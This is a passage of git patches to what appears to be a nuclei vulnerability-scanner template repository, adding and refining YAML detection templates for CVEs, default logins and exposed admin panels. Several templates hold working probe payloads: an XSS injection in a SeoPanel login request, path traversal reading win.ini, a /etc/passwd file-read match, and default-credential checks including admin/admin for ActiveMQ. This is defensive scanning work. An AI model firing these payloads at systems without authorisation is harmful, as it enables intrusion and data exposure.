+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-3002
+ cwe-id: CWE-79
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-3002
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-3002
+ tags: cve,cve2021,seopanel,xss
+
+requests:
+ - raw:
+ - |
+ POST /seo/seopanel/login.php?sec=forgot HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ sec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: word
+ part: body
+ words:
+ - "
11"
\ No newline at end of file
From 00dc60ef7324d7ebfda476d39b681bb8763e5df5 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Tue, 8 Mar 2022 01:22:18 +0530
Subject: [PATCH 069/259] misc updates
---
exposed-panels/kentico-login.yaml | 28 ++++++++++++++++------------
1 file changed, 16 insertions(+), 12 deletions(-)
diff --git a/exposed-panels/kentico-login.yaml b/exposed-panels/kentico-login.yaml
index 0911e767d4..dd78b255da 100644
--- a/exposed-panels/kentico-login.yaml
+++ b/exposed-panels/kentico-login.yaml
@@ -1,24 +1,28 @@
-id: Kentico-login
+id: kentico-login
info:
- name: Kentico Login Page Detection
+ name: Kentico Login Panel
author: d4vy
severity: info
- tags: panel, login, kentico
+ tags: panel,login,kentico
requests:
- method: GET
path:
- "{{BaseURL}}/Admin/CMSAdministration.aspx"
- - "{{BaseURL}}/CMSPages/logon.aspx?ReturnUrl=%2fAdmin%2fCMSAdministration.aspx"
+ - "{{BaseURL}}/CMSPages/logon.aspx"
- matchers-condition: and
+ stop-at-first-match: true
+ matchers-condition: or
matchers:
- - type: word
- part: body
- words:
- - 'action="./logon.aspx?ReturnUrl=%2fAdmin%2fCMSAdministration.aspx"'
+ - type: dsl
+ dsl:
+ - "status_code==302"
+ - "contains(tolower(body), 'cmspages/logon.aspx')"
+ condition: and
- - type: status
- status:
- - 200
+ - type: dsl
+ dsl:
+ - "status_code==200"
+ - "contains(tolower(body), 'cmspages/getresource.ashx')"
+ condition: and
\ No newline at end of file
From 6f36767069efa9dd5344c1398c983fd70aa14f92 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Tue, 8 Mar 2022 01:23:08 +0530
Subject: [PATCH 070/259] added reference
---
exposed-panels/kentico-login.yaml | 1 +
1 file changed, 1 insertion(+)
diff --git a/exposed-panels/kentico-login.yaml b/exposed-panels/kentico-login.yaml
index dd78b255da..30b81930bd 100644
--- a/exposed-panels/kentico-login.yaml
+++ b/exposed-panels/kentico-login.yaml
@@ -4,6 +4,7 @@ info:
name: Kentico Login Panel
author: d4vy
severity: info
+ reference: https://docs.xperience.io/k8/using-the-kentico-interface
tags: panel,login,kentico
requests:
From d2f7e17869054e4ad5977158d91dca2b123337bc Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Mon, 7 Mar 2022 19:54:55 +0000
Subject: [PATCH 071/259] Auto Generated New Template Addition List [Mon Mar 7
19:54:55 UTC 2022] :robot:
---
.new-additions | 1 +
1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index c5d1d55c98..7d994443d9 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,4 +1,5 @@
cves/2022/CVE-2022-0381.yaml
cves/2022/CVE-2022-23779.yaml
default-logins/digitalrebar/digitalrebar-default-login.yaml
+exposed-panels/kentico-login.yaml
vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
From 20774864c51599cb747cd2cd153b45bbb4431141 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Tue, 8 Mar 2022 01:28:57 +0530
Subject: [PATCH 072/259] misc updates
---
cves/2021/CVE-2021-3002.yaml | 8 +++++---
1 file changed, 5 insertions(+), 3 deletions(-)
diff --git a/cves/2021/CVE-2021-3002.yaml b/cves/2021/CVE-2021-3002.yaml
index 573900166e..781aba2d77 100644
--- a/cves/2021/CVE-2021-3002.yaml
+++ b/cves/2021/CVE-2021-3002.yaml
@@ -12,12 +12,12 @@ info:
cwe-id: CWE-79
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-3002
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-3002
+ - http://www.cinquino.eu/SeoPanelReflect.htm
tags: cve,cve2021,seopanel,xss
requests:
- raw:
- - |
+ - |
POST /seo/seopanel/login.php?sec=forgot HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
@@ -38,4 +38,6 @@ requests:
- type: word
part: body
words:
- - "11"
\ No newline at end of file
+ - ""
+ - "seopanel"
+ condition: and
\ No newline at end of file
From 1a5e5bda278fb7635ace09c1aaccd85b9393743c Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Mon, 7 Mar 2022 20:01:45 +0000
Subject: [PATCH 073/259] Auto Generated New Template Addition List [Mon Mar 7
20:01:44 UTC 2022] :robot:
---
.new-additions | 1 +
1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index 7d994443d9..c749ffc502 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,3 +1,4 @@
+cves/2021/CVE-2021-3002.yaml
cves/2022/CVE-2022-0381.yaml
cves/2022/CVE-2022-23779.yaml
default-logins/digitalrebar/digitalrebar-default-login.yaml
From 73a06a5fab6c3698dce2f18da71b753f565512b0 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 16:29:30 -0500
Subject: [PATCH 074/259] Enhancement: cves/2021/CVE-2021-44521.yaml by mp
---
cves/2021/CVE-2021-44521.yaml | 3 +++
1 file changed, 3 insertions(+)
diff --git a/cves/2021/CVE-2021-44521.yaml b/cves/2021/CVE-2021-44521.yaml
index 85daf83b30..0bd987b8a1 100644
--- a/cves/2021/CVE-2021-44521.yaml
+++ b/cves/2021/CVE-2021-44521.yaml
@@ -8,6 +8,7 @@ info:
reference:
- https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/
- https://nvd.nist.gov/vuln/detail/CVE-2021-44521
+ - https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/
tags: cve,cve2021,network,rce,apache,cassandra
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
@@ -54,3 +55,5 @@ network:
part: raw
words:
- "123123"
+
+# Enhanced by mp on 2022/03/07
From 1af2e53732c48a94efdcaa51ce71221ea62e13ea Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 16:30:03 -0500
Subject: [PATCH 075/259] Enhancement: cves/2010/CVE-2010-1607.yaml by mp
---
cves/2010/CVE-2010-1607.yaml | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/cves/2010/CVE-2010-1607.yaml b/cves/2010/CVE-2010-1607.yaml
index c3bc374891..d42c423c71 100644
--- a/cves/2010/CVE-2010-1607.yaml
+++ b/cves/2010/CVE-2010-1607.yaml
@@ -5,7 +5,6 @@ info:
author: daffainfo
severity: high
description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
- remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12316
- https://www.cvedetails.com/cve/CVE-2010-1607
@@ -26,4 +25,4 @@ requests:
status:
- 200
-# Enhanced by mp on 2022/02/15
+# Enhanced by mp on 2022/03/07
From 5a99c2c4f4cc957c1e2d58e000365811ad182154 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 16:36:44 -0500
Subject: [PATCH 076/259] Enhancement: cves/2022/CVE-2022-25323.yaml by mp
---
cves/2022/CVE-2022-25323.yaml | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-25323.yaml b/cves/2022/CVE-2022-25323.yaml
index 187fb5a0c3..9862f10447 100644
--- a/cves/2022/CVE-2022-25323.yaml
+++ b/cves/2022/CVE-2022-25323.yaml
@@ -1,10 +1,10 @@
id: CVE-2022-25323
info:
- name: ZEROF Web Server 2.0 XSS
+ name: ZEROF Web Server 2.0 Cross-Site Scripting
author: pikpikcu
severity: medium
- description: ZEROF Web Server 2.0 allows /admin.back XSS.
+ description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting.
reference:
- https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-25323
@@ -31,3 +31,5 @@ requests:
- type: status
status:
- 401
+
+# Enhanced by mp on 2022/03/07
From b7d2b80dd053c2ea668cc9f333478a4e8c6067d3 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 16:51:17 -0500
Subject: [PATCH 077/259] Enhancement:
default-logins/UCMDB/ucmdb-default-login.yaml by mp
---
default-logins/UCMDB/ucmdb-default-login.yaml | 9 ++++++++-
1 file changed, 8 insertions(+), 1 deletion(-)
diff --git a/default-logins/UCMDB/ucmdb-default-login.yaml b/default-logins/UCMDB/ucmdb-default-login.yaml
index d7dc80bd03..169611f6d5 100644
--- a/default-logins/UCMDB/ucmdb-default-login.yaml
+++ b/default-logins/UCMDB/ucmdb-default-login.yaml
@@ -1,9 +1,14 @@
id: ucmdb-default-login
info:
- name: Micro Focus UCMDB Default Login
+ name: Micro Focus Universal CMDB Default Login
author: dwisiswant0
severity: high
+ description: Micro Focus Universal CMDB default login credentials were discovered for diagnostics/admin. Note there is potential for this to be chained together with other vulnerabilities as with CVE-2020-11853 and CVE-2020-11854.
+ reference:
+ - https://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.htm
+ classification:
+ cwe-id: CWE-798
tags: ucmdb,default-login
requests:
@@ -31,3 +36,5 @@ requests:
part: header
words:
- "LWSSO_COOKIE_KEY"
+
+# Enhanced by mp on 2022/03/07
From b54ca5333afb994909b50e7c1922d531bb5d7f30 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 18:25:55 -0500
Subject: [PATCH 078/259] Enhancement:
default-logins/abb/cs141-default-login.yaml by mp
---
default-logins/abb/cs141-default-login.yaml | 7 ++++++-
1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml
index 92c18a864b..a5b739329c 100644
--- a/default-logins/abb/cs141-default-login.yaml
+++ b/default-logins/abb/cs141-default-login.yaml
@@ -1,13 +1,16 @@
id: cs141-default-login
info:
- name: CS141 SNMP Module Default Login
+ name: UPS Adapter CS141 SNMP Module Default Login
author: socketz
severity: medium
+ description: UPS Adapter CS141 SNMP Module default login credentials were discovered.
reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf
tags: hiawatha,iot,default-login
metadata:
shodan-query: https://www.shodan.io/search?query=html%3A%22CS141%22
+ classification:
+ cwe-id: CWE-798
requests:
- raw:
@@ -48,3 +51,5 @@ requests:
- type: kval
kval:
- accessToken
+
+# Enhanced by mp on 2022/03/07
From 54668eb20cfdd2bde073156c570edbbb6a42951d Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 18:30:38 -0500
Subject: [PATCH 079/259] Enhancement:
default-logins/activemq/activemq-default-login.yaml by mp
---
default-logins/activemq/activemq-default-login.yaml | 7 ++++++-
1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/default-logins/activemq/activemq-default-login.yaml b/default-logins/activemq/activemq-default-login.yaml
index a4dea884a5..e0344f7452 100644
--- a/default-logins/activemq/activemq-default-login.yaml
+++ b/default-logins/activemq/activemq-default-login.yaml
@@ -4,6 +4,9 @@ info:
name: Apache ActiveMQ Default Login
author: pdteam
severity: medium
+ description: Apache ActiveMQ default login information was discovered. The default administration user name and password for the Apache ActiveMQ Administration Console is admin and admin respectively.
+ remediation: Change the default credentials.
+ reference: https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html
tags: apache,activemq,default-login
requests:
@@ -26,4 +29,6 @@ requests:
words:
- 'Welcome to the Apache ActiveMQ Console of '
- 'Broker
'
- condition: and
\ No newline at end of file
+ condition: and
+
+# Enhanced by mp on 2022/03/07
From 246645a44cbf9266580d74e2b952a7953aaa7127 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 18:33:04 -0500
Subject: [PATCH 080/259] Enhancement:
default-logins/activemq/activemq-default-login.yaml by mp
---
default-logins/activemq/activemq-default-login.yaml | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/default-logins/activemq/activemq-default-login.yaml b/default-logins/activemq/activemq-default-login.yaml
index e0344f7452..9714139497 100644
--- a/default-logins/activemq/activemq-default-login.yaml
+++ b/default-logins/activemq/activemq-default-login.yaml
@@ -4,8 +4,7 @@ info:
name: Apache ActiveMQ Default Login
author: pdteam
severity: medium
- description: Apache ActiveMQ default login information was discovered. The default administration user name and password for the Apache ActiveMQ Administration Console is admin and admin respectively.
- remediation: Change the default credentials.
+ description: Apache ActiveMQ default login information was discovered.
reference: https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html
tags: apache,activemq,default-login
From 29d462125c216fc04ebd91f5ee21bf0b23ffdc13 Mon Sep 17 00:00:00 2001
From: Dwi Siswanto
Date: Tue, 8 Mar 2022 08:05:30 +0700
Subject: [PATCH 081/259] Add CVE-2022-24990
---
cves/2022/CVE-2022-24990.yaml | 40 +++++++++++++++++++++++++++++++++++
1 file changed, 40 insertions(+)
create mode 100644 cves/2022/CVE-2022-24990.yaml
diff --git a/cves/2022/CVE-2022-24990.yaml b/cves/2022/CVE-2022-24990.yaml
new file mode 100644
index 0000000000..9163b8bac3
--- /dev/null
+++ b/cves/2022/CVE-2022-24990.yaml
@@ -0,0 +1,40 @@
+id: CVE-2022-24990
+
+info:
+ name: TerraMaster TOS < 4.2.30 - Server Information Disclosure
+ author: dwisiswant0
+ severity: medium
+ description: |
+ TerraMaster NAS devices running TOS prior to version
+ 4.2.30 is vulnerable to information disclosure
+ reference:
+ - https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/
+ tags: cve,cve2022,terramaster,disclosure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/module/api.php?mobile/webNasIPS"
+ headers:
+ User-Agent: "TNAS"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "application/json"
+ - "TerraMaster"
+ condition: and
+
+ - type: regex
+ part: body
+ regex:
+ - "webNasIPS successful"
+ - "(ADDR|(IFC|PWD|[DS]AT)):"
+ - "\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":" # cherry pick
+ condition: or
From 6ae7f3f361746d8ce2afe67b24dd638c539817a6 Mon Sep 17 00:00:00 2001
From: Sandeep Singh
Date: Tue, 8 Mar 2022 06:38:46 +0530
Subject: [PATCH 082/259] Update CVE-2022-25323.yaml
---
cves/2022/CVE-2022-25323.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2022/CVE-2022-25323.yaml b/cves/2022/CVE-2022-25323.yaml
index 9862f10447..4500863480 100644
--- a/cves/2022/CVE-2022-25323.yaml
+++ b/cves/2022/CVE-2022-25323.yaml
@@ -4,7 +4,7 @@ info:
name: ZEROF Web Server 2.0 Cross-Site Scripting
author: pikpikcu
severity: medium
- description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting.
+ description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting.
reference:
- https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-25323
From f0eedd20b4f67b4fc4cc9969ab56bb17bef916d4 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Tue, 8 Mar 2022 01:30:21 +0000
Subject: [PATCH 083/259] Auto Generated New Template Addition List [Tue Mar 8
01:30:21 UTC 2022] :robot:
---
.new-additions | 1 +
1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index c749ffc502..1ac6e15e74 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,6 +1,7 @@
cves/2021/CVE-2021-3002.yaml
cves/2022/CVE-2022-0381.yaml
cves/2022/CVE-2022-23779.yaml
+cves/2022/CVE-2022-24990.yaml
default-logins/digitalrebar/digitalrebar-default-login.yaml
exposed-panels/kentico-login.yaml
vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
From f0d3116b12a353e95aaf0991b8751d80b3b1705e Mon Sep 17 00:00:00 2001
From: sandeep
Date: Tue, 8 Mar 2022 07:00:33 +0530
Subject: [PATCH 084/259] added metadata
---
cves/2022/CVE-2022-24990.yaml | 9 +++++----
1 file changed, 5 insertions(+), 4 deletions(-)
diff --git a/cves/2022/CVE-2022-24990.yaml b/cves/2022/CVE-2022-24990.yaml
index 9163b8bac3..2fabe04c31 100644
--- a/cves/2022/CVE-2022-24990.yaml
+++ b/cves/2022/CVE-2022-24990.yaml
@@ -7,9 +7,10 @@ info:
description: |
TerraMaster NAS devices running TOS prior to version
4.2.30 is vulnerable to information disclosure
- reference:
- - https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/
- tags: cve,cve2022,terramaster,disclosure
+ reference: https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/
+ metadata:
+ shodan-query: TerraMaster
+ tags: cve,cve2022,terramaster,exposure
requests:
- method: GET
@@ -37,4 +38,4 @@ requests:
- "webNasIPS successful"
- "(ADDR|(IFC|PWD|[DS]AT)):"
- "\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":" # cherry pick
- condition: or
+ condition: or
\ No newline at end of file
From f6af104d37f39207826bb394c8166acbc0435f13 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 8 Mar 2022 11:03:36 +0530
Subject: [PATCH 086/259] Update kibana-panel.yaml
---
exposed-panels/kibana-panel.yaml | 2 ++
1 file changed, 2 insertions(+)
diff --git a/exposed-panels/kibana-panel.yaml b/exposed-panels/kibana-panel.yaml
index 74bef2b479..fc3bc7f490 100644
--- a/exposed-panels/kibana-panel.yaml
+++ b/exposed-panels/kibana-panel.yaml
@@ -22,6 +22,8 @@ requests:
words:
- "Kibana"
- "Elastic"
+ - "Kibana Login"
+ condition: or
- type: regex
part: header
From e14b913101f214f160db0f57eea300ac4e9de8ab Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 8 Mar 2022 11:12:39 +0530
Subject: [PATCH 087/259] Update CVE-2020-15050.yaml
---
cves/2020/CVE-2020-15050.yaml | 7 ++++---
1 file changed, 4 insertions(+), 3 deletions(-)
diff --git a/cves/2020/CVE-2020-15050.yaml b/cves/2020/CVE-2020-15050.yaml
index 3fc4b0f9ba..c3a0c4953d 100644
--- a/cves/2020/CVE-2020-15050.yaml
+++ b/cves/2020/CVE-2020-15050.yaml
@@ -7,23 +7,24 @@ info:
description: An issue was discovered in the Video Extension in Suprema BioStar 2 before 2.8.2. Remote attackers can read arbitrary files from the server via Directory Traversal.
reference:
- http://packetstormsecurity.com/files/158576/Bio-Star-2.8.2-Local-File-Inclusion.html
+ - https://www.supremainc.com/en/support/biostar-2-pakage.asp
- https://nvd.nist.gov/vuln/detail/CVE-2020-15050
- tags: cve,cve2020,lfi,suprema,biostar2
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.50
cve-id: CVE-2020-15050
+ tags: cve,cve2020,lfi,suprema,biostar2
requests:
- method: GET
path:
- - "{{BaseURL}}/../../../../../../../../../../../../windows/win.in"
+ - "{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"
matchers:
- type: word
+ part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
- part: body
From ec28b289119c3bd0eb040756b05dec741a626c0d Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Tue, 8 Mar 2022 05:47:58 +0000
Subject: [PATCH 088/259] Auto Generated New Template Addition List [Tue Mar 8
05:47:58 UTC 2022] :robot:
---
.new-additions | 1 +
1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index 1ac6e15e74..198323ba40 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,3 +1,4 @@
+cves/2020/CVE-2020-15050.yaml
cves/2021/CVE-2021-3002.yaml
cves/2022/CVE-2022-0381.yaml
cves/2022/CVE-2022-23779.yaml
From 61d50b83574f9deace0742d813345beb225c9bba Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Tue, 8 Mar 2022 06:20:08 +0000
Subject: [PATCH 089/259] Auto Generated New Template Addition List [Tue Mar 8
06:20:08 UTC 2022] :robot:
---
.new-additions | 1 +
1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index 198323ba40..dab23f98f9 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,3 +1,4 @@
+boa-web-fileread.yaml
cves/2020/CVE-2020-15050.yaml
cves/2021/CVE-2021-3002.yaml
cves/2022/CVE-2022-0381.yaml
From 44f96f31158cc5a48aea6636c571a5d7ca574126 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 8 Mar 2022 11:51:07 +0530
Subject: [PATCH 090/259] Update and rename boa-web-fileread.yaml to
cves/2017/CVE-2017-9833.yaml
---
boa-web-fileread.yaml => cves/2017/CVE-2017-9833.yaml | 5 ++---
1 file changed, 2 insertions(+), 3 deletions(-)
rename boa-web-fileread.yaml => cves/2017/CVE-2017-9833.yaml (94%)
diff --git a/boa-web-fileread.yaml b/cves/2017/CVE-2017-9833.yaml
similarity index 94%
rename from boa-web-fileread.yaml
rename to cves/2017/CVE-2017-9833.yaml
index fa74016601..d6de011f4a 100644
--- a/boa-web-fileread.yaml
+++ b/cves/2017/CVE-2017-9833.yaml
@@ -1,4 +1,4 @@
-id: boa-web-fileRead
+id: CVE-2017-9833
info:
name: BOA Web Server 0.94.14 - Access to arbitrary files as privileges
@@ -8,7 +8,7 @@ info:
reference:
- https://www.exploit-db.com/exploits/42290
- https://www.cvedetails.com/cve/CVE-2017-9833
- tags: boa,fileread,lfi
+ tags: boa,lfr,lfi,cve,cve2017
requests:
- method: GET
@@ -17,7 +17,6 @@ requests:
matchers-condition: and
matchers:
-
- type: regex
regex:
- "root:[x*]:0:0"
From 3fd34746efe5b05b74cb38c9642e4223bf8aa023 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Tue, 8 Mar 2022 06:53:03 +0000
Subject: [PATCH 092/259] Auto Generated New Template Addition List [Tue Mar 8
06:53:03 UTC 2022] :robot:
---
.new-additions | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.new-additions b/.new-additions
index dab23f98f9..158dc1c7a3 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,4 +1,4 @@
-boa-web-fileread.yaml
+cves/2017/CVE-2017-9833.yaml
cves/2020/CVE-2020-15050.yaml
cves/2021/CVE-2021-3002.yaml
cves/2022/CVE-2022-0381.yaml
From a85cb6354e3c3d4d9b52d766df70c40f6860dac2 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Tue, 8 Mar 2022 06:53:29 +0000
Subject: [PATCH 093/259] Auto Generated CVE annotations [Tue Mar 8 06:53:29
UTC 2022] :robot:
---
cves/2017/CVE-2017-9833.yaml | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/cves/2017/CVE-2017-9833.yaml b/cves/2017/CVE-2017-9833.yaml
index d6de011f4a..32ba227b0b 100644
--- a/cves/2017/CVE-2017-9833.yaml
+++ b/cves/2017/CVE-2017-9833.yaml
@@ -9,6 +9,11 @@ info:
- https://www.exploit-db.com/exploits/42290
- https://www.cvedetails.com/cve/CVE-2017-9833
tags: boa,lfr,lfi,cve,cve2017
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2017-9833
+ cwe-id: CWE-22
requests:
- method: GET
From b6e96c73a87e8affa10d159284a5556c6f080ca3 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 09:58:58 -0500
Subject: [PATCH 095/259] Enhancement: cves/2022/CVE-2022-21371.yaml by mp
---
cves/2022/CVE-2022-21371.yaml | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-21371.yaml b/cves/2022/CVE-2022-21371.yaml
index ba91d44289..05d2b3a606 100644
--- a/cves/2022/CVE-2022-21371.yaml
+++ b/cves/2022/CVE-2022-21371.yaml
@@ -1,11 +1,12 @@
id: CVE-2022-21371
info:
- name: Oracle WebLogic Server LFI
+ name: Oracle WebLogic Server Local File Inclusion
author: paradessia,narluin
severity: high
- description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts).
+ description: An easily exploitable local file inclusion vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data.
reference:
+ - https://www.oracle.com/security-alerts/cpujan2022.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-21371
- https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786
classification:
@@ -45,3 +46,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/08
From f15357f415c01a864fafd317b541feb14c837b23 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 10:03:35 -0500
Subject: [PATCH 096/259] Enhancement: cves/2022/CVE-2022-0692.yaml by mp
---
cves/2022/CVE-2022-0692.yaml | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-0692.yaml b/cves/2022/CVE-2022-0692.yaml
index d4817c0ab5..ea0605c14f 100644
--- a/cves/2022/CVE-2022-0692.yaml
+++ b/cves/2022/CVE-2022-0692.yaml
@@ -4,7 +4,7 @@ info:
name: Rudloff alltube prior to 3.0.1 - Open Redirect
author: 0x_Akoko
severity: medium
- description: Open Redirect on Rudloff/alltube in Packagist rudloff/alltube prior to 3.0.1
+ description: "An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist rudloff/alltube in versions prior to 3.0.1."
reference:
- https://huntr.dev/bounties/4fb39400-e08b-47af-8c1f-5093c9a51203/
- https://www.cvedetails.com/cve/CVE-2022-0692
@@ -24,4 +24,6 @@ requests:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
\ No newline at end of file
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+
+# Enhanced by mp on 2022/03/08
From d0be94c1854938ac63edbbeaa0201b1c84d0413f Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 10:09:38 -0500
Subject: [PATCH 097/259] Enhancement: cves/2022/CVE-2022-22536.yaml by mp
---
cves/2022/CVE-2022-22536.yaml | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-22536.yaml b/cves/2022/CVE-2022-22536.yaml
index 171684f17d..e307de2556 100644
--- a/cves/2022/CVE-2022-22536.yaml
+++ b/cves/2022/CVE-2022-22536.yaml
@@ -1,10 +1,10 @@
id: CVE-2022-22536
info:
- name: SAP Memory Pipes(MPI) Desynchronization
+ name: SAP Memory Pipes (MPI) Desynchronization
author: pdteam
severity: critical
